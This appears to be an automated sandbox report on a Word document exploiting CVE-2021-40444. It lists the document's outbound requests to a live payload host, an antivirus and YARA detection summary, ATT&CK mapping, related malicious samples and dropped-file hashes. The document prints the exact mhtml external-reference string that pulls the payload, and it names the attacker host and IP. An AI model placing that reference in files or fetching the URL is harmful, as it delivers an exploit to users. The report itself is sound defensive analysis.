Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{636165D4-957F-4FF6-8584-BFA7FFC416EB}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: qaz.im
Source: global trafficHTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global trafficHTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global trafficHTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global trafficHTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: unknownHTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: document.xml.rels, type: SAMPLEMatched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: nnxPt0Yydv.docReversingLabs: Detection: 50%
Source: nnxPt0Yydv.docVirustotal: Detection: 48%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: nnxPt0Yydv.LNK.0.drLNK file: ..\..\..\..\..\Desktop\nnxPt0Yydv.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$xPt0Yydv.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7020.tmpJump to behavior
Source: classification engineClassification label: mal68.expl.evad.winDOC@1/17@9/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: nnxPt0Yydv.docInitial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Persistence and Installation Behavior

barindex
Contains an external reference to another file
Source: document.xml.relsExtracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts13
Exploitation for Client Execution		Path InterceptionPath Interception1
Masquerading		OS Credential Dumping1
File and Directory Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
System Information Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
Non-Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
Ingress Tool Transfer		SIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
nnxPt0Yydv.doc50%ReversingLabsDocument-Office.Exploit.CVE-2021-40444
nnxPt0Yydv.doc48%VirustotalBrowse
nnxPt0Yydv.doc100%AviraEXP/CVE-2021-40444.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
qaz.im2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df60%Avira URL Cloudsafe
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df63%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
qaz.im
82.202.173.45
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6false
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
82.202.173.45
qaz.imRussian Federation
29182THEFIRST-ASRUtrue

General Information

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:696518
Start date and time:2022-09-02 13:23:11 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:nnxPt0Yydv.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:1
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.expl.evad.winDOC@1/17@9/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer

Warnings

  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
qaz.imnew_fax_document_1426.docGet hashmaliciousBrowse
  • 92.63.97.69

ASNs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
THEFIRST-ASRUXLxhs0bnxW.exeGet hashmaliciousBrowse
  • 82.146.39.104
a26aed7d.exeGet hashmaliciousBrowse
  • 78.24.219.147
eQzca5P8PR.exeGet hashmaliciousBrowse
  • 37.46.129.215
eQzca5P8PR.exeGet hashmaliciousBrowse
  • 37.46.129.215
ikoT65t8ds.exeGet hashmaliciousBrowse
  • 78.24.216.5
gpn5jhMWlt.exeGet hashmaliciousBrowse
  • 78.24.216.5
0ecM7AGVxk.exeGet hashmaliciousBrowse
  • 78.24.216.5
DE2B2195985ADEC944F3E2515402346E96F67C9893F46.exeGet hashmaliciousBrowse
  • 80.87.202.92
http://app.adrecover.netGet hashmaliciousBrowse
  • 82.146.50.209
MmU47YziW3Get hashmaliciousBrowse
  • 62.109.30.199
12hpznE4oG.exeGet hashmaliciousBrowse
  • 188.120.225.17
1586BE1A8D88A8593CB0D5ED7F779FC672A0E58C4D5B3.exeGet hashmaliciousBrowse
  • 78.24.217.56
http://sjsmartcontent.orgGet hashmaliciousBrowse
  • 78.24.217.133
dnkLjCWBdFGet hashmaliciousBrowse
  • 37.230.119.194
botx.armGet hashmaliciousBrowse
  • 62.109.30.125
58822m9MheGet hashmaliciousBrowse
  • 62.109.30.128
hSSdjnzA1f.exeGet hashmaliciousBrowse
  • 83.220.168.58
home.mips-20220723-1056Get hashmaliciousBrowse
  • 37.230.119.181
http://norge.ru/news/2017/11/09/27146.htmlGet hashmaliciousBrowse
  • 213.159.215.142
http://norge.ru/news/2017/11/09/27146.htmlGet hashmaliciousBrowse
  • 213.159.215.142

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
05af1f5ca1b87cc9cc9b25185115607dUniversiti Malaya_1.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
104 LEFTIES SAMPLES.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
Passport and ID details for Booking.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.VB.Trojan.Valyria.7101.17611.3854.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.VB.Trojan.Valyria.7101.7905.2281.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
Bank Transfer Aplication.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
HOM AL200007594.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.VBA.Logan.3710.9742.18024.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
QUOTATION REQUIRED.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
QuoteX5092137.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
Order.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
6.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
PO-082822.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
PROFORMA_REVISED & UPDATED No[20220826.docxGet hashmaliciousBrowse
  • 82.202.173.45
Payment Advice Note.xlsGet hashmaliciousBrowse
  • 82.202.173.45
ACH Remittance Advice_CITI25822.xlsGet hashmaliciousBrowse
  • 82.202.173.45
Electronic Payment.xlsGet hashmaliciousBrowse
  • 82.202.173.45
EFT Payment Remittance.xlsGet hashmaliciousBrowse
  • 82.202.173.45
MV_GRACE-Tuticorin-EPDA for AUGUST 22 (STATEMENT)_10.docxGet hashmaliciousBrowse
  • 82.202.173.45
EFT Payment Remittance.xlsGet hashmaliciousBrowse
  • 82.202.173.45
7dcce5b76c8b17472d024758970a406bCh-Comptes311 (2) (9).docxGet hashmaliciousBrowse
  • 82.202.173.45
glenn.duncan.shtmlGet hashmaliciousBrowse
  • 82.202.173.45
application.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
Universiti Malaya_1.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
104 LEFTIES SAMPLES.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
Passport and ID details for Booking.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.VB.Trojan.Valyria.7101.17611.3854.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.VB.Trojan.Valyria.7101.7905.2281.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
STEEL-GI PHOTO FROM SMC STEEL GROUP CO.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
E-tender 05-2022-Post Tender Clarification Form-Ms. NAFAL CONTRACTING TRADING CO LLC.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.32608.12463.rtfGet hashmaliciousBrowse
  • 82.202.173.45
Bank Transfer Aplication.docx.docGet hashmaliciousBrowse
  • 82.202.173.45
Bank in slip.docGet hashmaliciousBrowse
  • 82.202.173.45
Invoice220831.docGet hashmaliciousBrowse
  • 82.202.173.45
August Pay Requisition Approved.htmlGet hashmaliciousBrowse
  • 82.202.173.45
2_202208556158096611.xlsmGet hashmaliciousBrowse
  • 82.202.173.45
1_202208908077543493.xlsGet hashmaliciousBrowse
  • 82.202.173.45
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.20938.8885.rtfGet hashmaliciousBrowse
  • 82.202.173.45
Invoice GW0175947.xlsxGet hashmaliciousBrowse
  • 82.202.173.45
ROYAL SUVARNABHUMI CARGO DETAILS.xlsxGet hashmaliciousBrowse
  • 82.202.173.45

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.28879490407012426
Encrypted:false
SSDEEP:48:I3ZrsRB68BT/wV0yYRzCmrWIdIP+ltUQ+VrXJkVIPpIPOH:K+LLoOd/xU5kOH
MD5:30075DA75A69E03B91CDC295A738FE71
SHA1:5C8EB1D3F7DC5B502212314F6405B25C9766603C
SHA-256:29A90C402102B1E2616519F5DE7AA09426AAAB3559494E5EBFDA3DA1DC16A660
SHA-512:172699B6B75DA2A3074DCBE0C418C34D00F964C84BF758940DEF4A4718394AFF0AED477B184D25C1A9280522E7ABBCC6083143CBA88500A40B7C2A67A7B6F363
Malicious:false
Reputation:low
Preview:......M.eFy...zj....VF@.....a..S,...X.F...Fa.q............................r.$.eN.C....l?...........3-..L........A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{0CEDFB9A-672A-495E-A8C3-4E2E5CC4FEA5}.FSD

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.6734044956719611
Encrypted:false
SSDEEP:96:KOCyQlWIZP3wHLRN7Xrka3oGX16Ilkl2IYP9gzS6WtPWtuWtUgt:ZzuoLyGXPwQlgzUib5
MD5:848796E37A8642B8F3B45C6176D8E814
SHA1:2D1D922A49C8B09E7B9FB8E0FDFE9A642E65B624
SHA-256:92BB7EFDF1993B4DD43843D0595C911F5AE646CEC4047CEEC557E6B6E9C641DC
SHA-512:15AA1AEF8EB965E8051358F3B98E7BE4EB0F7AE9D59783DA64F5DAFB8DB8461DDE5594B5B3842415DF26BCA06CF30EC2A4079A8DA68399B6C367F9D05C841DB9
Malicious:false
Reputation:low
Preview:......M.eFy...zR..C.}.L..6*.[..S,...X.F...Fa.q.............................R..]..G.}:Ia...........D.....H...Y o...S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):114
Entropy (8bit):3.9508758081628756
Encrypted:false
SSDEEP:3:yVlgsRlztlZlULTINDtgI+F/YRogQ8lSR56aw27276:yPblzJyL8ZWI++qV8lSSBg22
MD5:99A54F4CFBDA747E27CF539D4A1807FF
SHA1:5EFB6E4012D07C7820C1022141A6B658AEC2CDB1
SHA-256:98FB7578F8FE1FAFDBE7B2AFD3B37E39161F2C3622433387CCF7AE6E178CC83E
SHA-512:0883837836C43A8201145CC9799409478863B1BF30ADE6E5A329B542EEC598427E4E31F3973F819D2B56723FEA6C7EA3B0DA0712EF56DF982BAAC1801AFA524E
Malicious:false
Reputation:low
Preview:..H..@....b..q....]F.S.D.-.{.0.C.E.D.F.B.9.A.-.6.7.2.A.-.4.9.5.E.-.A.8.C.3.-.4.E.2.E.5.C.C.4.F.E.A.5.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

